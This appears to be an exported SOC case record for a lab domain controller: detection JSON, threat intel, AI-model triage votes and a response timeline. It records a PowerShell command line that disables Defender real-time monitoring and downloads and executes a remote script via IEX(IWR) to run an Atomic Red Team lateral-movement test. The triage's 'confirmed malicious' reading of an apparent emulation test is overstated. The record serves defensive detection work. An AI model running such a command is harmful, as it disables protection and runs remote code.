โ
Case #512
general.RealTime Monitoring Tampering
๐ท๏ธ Analyst Verdict Classification
SUSPICIOUS by analyst๐ค AI Analysis
๐ Detections (1)
Realtime Monitoring Process Killed PID 8396
high
Rule: general.RealTime Monitoring Tampering
Hostname: df-labsdc01.dflabs.local ยท Sensor: e4a1c62d-4d1f-44...
Event Type: NEW_PROCESS
Confidence: 82% ยท Verdict: suspicious
Event Data:
BASE_ADDRESS:
140694944940032
COMMAND_LINE:
PowerShell.exe Set-ExecutionPolicy Unrestricted ; [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 ; Install-PackageProvider -Name NuGet -MinimumVersion 2.8.5.201 -Force; Set-MpPreference -DisableRealtimeMonitoring $true ; IEX (IWR 'https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/install-atomicredteam.ps1' -UseBasicParsing) ; Install-AtomicRedTeam -Force -getAtomics; Invoke-AtomicTest T1021.005 -CheckPrereqs ; Invoke-AtomicTest T1021.005 -GetPrereqs ; Invoke-AtomicTest T1021.005
FILE_IS_SIGNED:
1
FILE_PATH:
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
HASH:
de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c
MEMORY_USAGE:
155828224
PARENT:
{'BASE_ADDRESS': 140698856259584, 'COMMAND_LINE': 'cmd.exe /C C:\\Windows\\TEMP\\pldB3A2.tmp.bat T1021.005 ', 'FILE_IS_SIGNED': 1, 'FILE_PATH': 'C:\\Windows\\System32\\cmd.exe', 'HASH': '3656f37a1c6951ec4496fabb8ee957d3a6e3c276d5a3785476b482c9c0d32ea2', 'MEMORY_USAGE': 4489216, 'PARENT_ATOM': 'd2b1ecad7af81b32ac16ae0d69c2a7fe', 'PARENT_PROCESS_ID': 3496, 'PROCESS_ID': 8396, 'THIS_ATOM': 'd55d696523198bca24198fe369c2a848', 'THREADS': 3, 'TIMESTAMP': 1774364743439, 'USER_NAME': 'NT AUTHORITY\\SYSTEM'}
PARENT_PROCESS_ID:
8396
PROCESS_ID:
7484
THREADS:
31
USER_NAME:
NT AUTHORITY\SYSTEM
IOCs:
{'type': 'command_line', 'value': "Set-MpPreference -DisableRealtimeMonitoring $true ; IEX (IWR 'https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/install-atomicredteam.ps1' -UseBasicParsing)"}
{'type': 'url', 'value': 'https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/install-atomicredteam.ps1'}
{'type': 'technique', 'value': 'T1021.005 (Lateral Movement via Remote Services)'}
MITRE:
T1021.005
T1567.001
Analyst Declaration:
๐ Raw Detection JSON
{
"author": "ckeller@fusioncybersecurity.us",
"cat": "Realtime Monitoring Process Killed PID 8396",
"detect": {
"event": {
"BASE_ADDRESS": 140694944940032,
"COMMAND_LINE": "PowerShell.exe Set-ExecutionPolicy Unrestricted ; [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 ; Install-PackageProvider -Name NuGet -MinimumVersion 2.8.5.201 -Force; Set-MpPreference -DisableRealtimeMonitoring $true ; IEX (IWR \u0027https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/install-atomicredteam.ps1\u0027 -UseBasicParsing) ; Install-AtomicRedTeam -Force -getAtomics; Invoke-AtomicTest T1021.005 -CheckPrereqs ; Invoke-AtomicTest T1021.005 -GetPrereqs ; Invoke-AtomicTest T1021.005 ",
"FILE_IS_SIGNED": 1,
"FILE_PATH": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
"HASH": "de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c",
"MEMORY_USAGE": 155828224,
"PARENT": {
"BASE_ADDRESS": 140698856259584,
"COMMAND_LINE": "cmd.exe /C C:\\Windows\\TEMP\\pldB3A2.tmp.bat T1021.005 ",
"FILE_IS_SIGNED": 1,
"FILE_PATH": "C:\\Windows\\System32\\cmd.exe",
"HASH": "3656f37a1c6951ec4496fabb8ee957d3a6e3c276d5a3785476b482c9c0d32ea2",
"MEMORY_USAGE": 4489216,
"PARENT_ATOM": "d2b1ecad7af81b32ac16ae0d69c2a7fe",
"PARENT_PROCESS_ID": 3496,
"PROCESS_ID": 8396,
"THIS_ATOM": "d55d696523198bca24198fe369c2a848",
"THREADS": 3,
"TIMESTAMP": 1774364743439,
"USER_NAME": "NT AUTHORITY\\SYSTEM"
},
"PARENT_PROCESS_ID": 8396,
"PROCESS_ID": 7484,
"THREADS": 31,
"USER_NAME": "NT AUTHORITY\\SYSTEM"
},
"routing": {
"arch": 2,
"did": "",
"event_id": "4b0a0986-d73e-4eb4-b561-a59fbcb46da2",
"event_time": 1774364744023,
"event_type": "NEW_PROCESS",
"ext_ip": "67.60.122.240",
"hostname": "df-labsdc01.dflabs.local",
"iid": "47501359-645e-4049-906e-e6195da7afcf",
"int_ip": "192.168.45.129",
"latency": 2893,
"moduleid": 2,
"oid": "ad19afae-3759-4207-b06e-8648b225c455",
"parent": "d55d696523198bca24198fe369c2a848",
"plat": 268435456,
"sid": "e4a1c62d-4d1f-4472-bae4-43291246b4d4",
"tags": [
"domain-controller",
"fusion-soc-alert",
"fusion-soc-case",
"fusion-soc-pulled",
"fusion-soc-triage"
],
"this": "206ee127bfd4633f7821f3c569c2a84a"
}
},
"detect_id": "31601403-8725-4c95-b727-53cd69c2a84a",
"gen_time": 1774364746922,
"link": "https://app.limacharlie.io/orgs/ad19afae-3759-4207-b06e-8648b225c455/sensors/e4a1c62d-4d1f-4472-bae4-43291246b4d4/timeline?time=1774364744\u0026selected=206ee127bfd4633f7821f3c569c2a84a",
"namespace": "general",
"routing": {
"arch": 2,
"did": "",
"event_id": "4b0a0986-d73e-4eb4-b561-a59fbcb46da2",
"event_time": 1774364744023,
"event_type": "NEW_PROCESS",
"ext_ip": "67.60.122.240",
"hostname": "df-labsdc01.dflabs.local",
"iid": "47501359-645e-4049-906e-e6195da7afcf",
"int_ip": "192.168.45.129",
"latency": 2893,
"moduleid": 2,
"oid": "ad19afae-3759-4207-b06e-8648b225c455",
"parent": "d55d696523198bca24198fe369c2a848",
"plat": 268435456,
"sid": "e4a1c62d-4d1f-4472-bae4-43291246b4d4",
"tags": [
"domain-controller",
"fusion-soc-alert",
"fusion-soc-case",
"fusion-soc-pulled",
"fusion-soc-triage"
],
"this": "206ee127bfd4633f7821f3c569c2a84a"
},
"source": "ad19afae-3759-4207-b06e-8648b225c455.47501359-645e-4049-906e-e6195da7afcf.e4a1c62d-4d1f-4472-bae4-43291246b4d4.10000000.2",
"source_rule": "general.RealTime Monitoring Tampering",
"ts": 1774364747000
}
๐ Threat Intel JSON
{
"virustotal": {
"malicious": false,
"provider": "virustotal",
"reputation": 73,
"stats": {
"confirmed-timeout": 0,
"failure": 0,
"harmless": 0,
"malicious": 0,
"suspicious": 0,
"timeout": 0,
"type-unsupported": 4,
"undetected": 72
}
}
}
๐ค Triage JSON
{
"confidence": 0.825,
"false_positive_reason": null,
"investigation_questions": [
"What other processes were spawned by PID 7484?",
"Are there any new files or registry keys created on this host?",
"Was the user account compromised prior to this event?"
],
"ioc_analysis": "The command line explicitly disables real-time monitoring (Set-MpPreference -DisableRealtimeMonitoring $true) and downloads/installs the Atomic Red Team framework via IEX. The use of Invoke-AtomicTest T1021.005 indicates an active test for lateral movement, which is a confirmed malicious intent. While PowerShell.exe is signed and located in System32, the context of execution (disabling security tools, downloading external scripts) overrides these benign indicators.",
"iocs_extracted": [
{
"type": "command_line",
"value": "Set-MpPreference -DisableRealtimeMonitoring $true ; IEX (IWR \u0027https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/install-atomicredteam.ps1\u0027 -UseBasicParsing)"
},
{
"type": "url",
"value": "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/install-atomicredteam.ps1"
},
{
"type": "technique",
"value": "T1021.005 (Lateral Movement via Remote Services)"
}
],
"mitre_techniques": [
"T1021.005",
"T1567.001"
],
"recommended_actions": [
"Manual analyst review required \u2014 AI models (split)",
"Immediately isolate the host from the network to prevent lateral movement.",
"Block the source IP and URL at the firewall level.",
"Review all recent PowerShell execution logs for similar patterns.",
"Initiate incident response procedures per SOC policy."
],
"risk_score": 82,
"severity": "high",
"summary": "**Vote: SPLIT (1/2 -\u003e SUSPICIOUS)**\n\n### \u264a gemini-cli Analysis (Primary)\nFailed or timed out.\n\n---\n\n### \ud83e\udd16 qwen3.5:4b Analysis (Secondary)\n**Verdict:** true_positive | **Confidence:** 0.95\nThis event represents a confirmed malicious activity where an attacker is disabling real-time monitoring and deploying the Atomic Red Team framework to test for lateral movement. The process tree shows a clear chain of execution from cmd.exe to PowerShell, indicating a deliberate attack rather than a false positive.\n\n**IOC Analysis:** The command line explicitly disables real-time monitoring (Set-MpPreference -DisableRealtimeMonitoring $true) and downloads/installs the Atomic Red Team framework via IEX. The use of Invoke-AtomicTest T1021.005 indicates an active test for lateral movement, which is a confirmed malicious intent. While PowerShell.exe is signed and located in System32, the context of execution (disabling security tools, downloading external scripts) overrides these benign indicators.\n\n---\n\n### \ud83e\udd16 deepseek-r1:8b Analysis (Secondary)\n**Verdict:** suspicious | **Confidence:** 0.7\nThe detection involves a legitimate PowerShell process from C:\\Windows\\System32, but the command line disables real-time monitoring and installs Atomic Red Team tools, indicating potential malicious intent to evade detection.\n\n**IOC Analysis:** The FILE_PATH is a known legitimate Windows system binary located in C:\\Windows\\System32, which is expected to be benign. However, the command line includes commands to disable real-time monitoring and install red teaming tools from external sources, which is suspicious. The hash is for a Microsoft-signed binary, supporting legitimacy, but the actions suggest evasion techniques.",
"verdict": "suspicious",
"voting": {
"auto_action": "manual_review",
"mode": "split",
"total_models": 2,
"vote_summary": [
"qwen3.5:4b: true_positive (critical, 95% confidence)",
"deepseek-r1:8b: suspicious (high, 70% confidence)"
],
"votes": [
{
"confidence": 0.95,
"model": "qwen3.5:4b",
"verdict": "true_positive"
},
{
"confidence": 0.7,
"model": "deepseek-r1:8b",
"verdict": "suspicious"
}
],
"winning_count": 1,
"winning_verdict": "suspicious"
}
}
โ๏ธ Response Actions
| Action | Target | Status | Result | |
|---|---|---|---|---|
| tag | failed | 401 Client Error: Unauthorized for url: https://api.limacharlie.io/v1/e4a1c62d-4d1f-4472-bae4-43291246b4d4/tags?tags=fusionsoc-investigated | ||
| recommended | executed | General Activity Sweep: 0 events found | ||
| recommended | executed | Lateral Movement Investigation: 50 events found | ||
| recommended | executed | General Activity Sweep: 0 events found | ||
| recommended | executed | General Activity Sweep: 0 events found | ||
| recommended | executed | General Activity Sweep: 0 events found |
๐ Add Note
๐ฌ Notes (6)
๐ค FusionSOC AI
2026-03-24T16:51
๐ค FusionSOC AI
2026-03-24T16:51
๐ค FusionSOC AI
2026-03-24T16:51
๐ค FusionSOC AI
2026-03-24T16:51
๐ค FusionSOC AI
2026-03-24T16:51
๐ค FusionSOC AI
2026-03-24T16:51
๐ Timeline
2026-03-24T17:30:27
analyst
Status changed: investigating โ closed
2026-03-24T17:30:23
analyst
Analyst classified as Suspicious (SUSPICIOUS)
2026-03-24T16:51:46
FusionSOC AI
Status changed: investigating โ investigating
2026-03-24T16:51:46
FusionSOC
Action recommended โ executed: General Activity Sweep: 0 events found
2026-03-24T16:51:46
FusionSOC AI
Note by FusionSOC AI: ## ๐ General Activity Sweep **Action:** Initiate incident response procedures per SOC policy. **Sensor:** `e4a1c62d-4d1f...
2026-03-24T16:51:46
FusionSOC
Response action queued: recommended on Initiate incident response procedures per SOC policy.
2026-03-24T16:51:46
FusionSOC AI
Status changed: investigating โ investigating
2026-03-24T16:51:46
FusionSOC
Action recommended โ executed: General Activity Sweep: 0 events found
2026-03-24T16:51:46
FusionSOC AI
Note by FusionSOC AI: ## ๐ General Activity Sweep **Action:** Review all recent PowerShell execution logs for similar patterns. **Sensor:** `e...
2026-03-24T16:51:46
FusionSOC
Response action queued: recommended on Review all recent PowerShell execution logs for similar patterns.
2026-03-24T16:51:46
FusionSOC AI
Status changed: investigating โ investigating
2026-03-24T16:51:46
FusionSOC
Action recommended โ executed: General Activity Sweep: 0 events found
2026-03-24T16:51:46
FusionSOC AI
Note by FusionSOC AI: ## ๐ General Activity Sweep **Action:** Block the source IP and URL at the firewall level. **Sensor:** `e4a1c62d-4d1f-44...
2026-03-24T16:51:46
FusionSOC
Response action queued: recommended on Block the source IP and URL at the firewall level.
2026-03-24T16:51:46
FusionSOC AI
Status changed: investigating โ investigating
2026-03-24T16:51:46
FusionSOC
Action recommended โ executed: Lateral Movement Investigation: 50 events found
2026-03-24T16:51:46
FusionSOC AI
Note by FusionSOC AI: ## ๐ Lateral Movement Investigation **Action:** Immediately isolate the host from the network to prevent lateral movemen...
2026-03-24T16:51:45
FusionSOC
Response action queued: recommended on Immediately isolate the host from the network to prevent lateral movement.
2026-03-24T16:51:45
FusionSOC AI
Status changed: open โ investigating
2026-03-24T16:51:45
FusionSOC
Action recommended โ executed: General Activity Sweep: 0 events found
2026-03-24T16:51:45
FusionSOC AI
Note by FusionSOC AI: ## ๐ General Activity Sweep **Action:** Manual analyst review required โ AI models (split) **Sensor:** `e4a1c62d-4d1f-44...
2026-03-24T16:51:44
FusionSOC
Response action queued: recommended on Manual analyst review required โ AI models (split)
2026-03-24T16:51:44
FusionSOC
Action tag โ failed: 401 Client Error: Unauthorized for url: https://api.limacharlie.io/v1/e4a1c62d-4d1f-4472-bae4-43291246b4d4/tags?tags=fusionsoc-investigated
2026-03-24T16:51:44
FusionSOC
Response action queued: tag on e4a1c62d-4d1f-4472-bae4-43291246b4d4:fusionsoc-investigated
2026-03-24T16:51:44
FusionSOC AI
Detection 31601403-8725-4c95-b727-53cd69c2a84a triaged as suspicious (high severity, confidence: 82%)
2026-03-24T16:51:44
FusionSOC AI
Case created from detection: general.RealTime Monitoring Tampering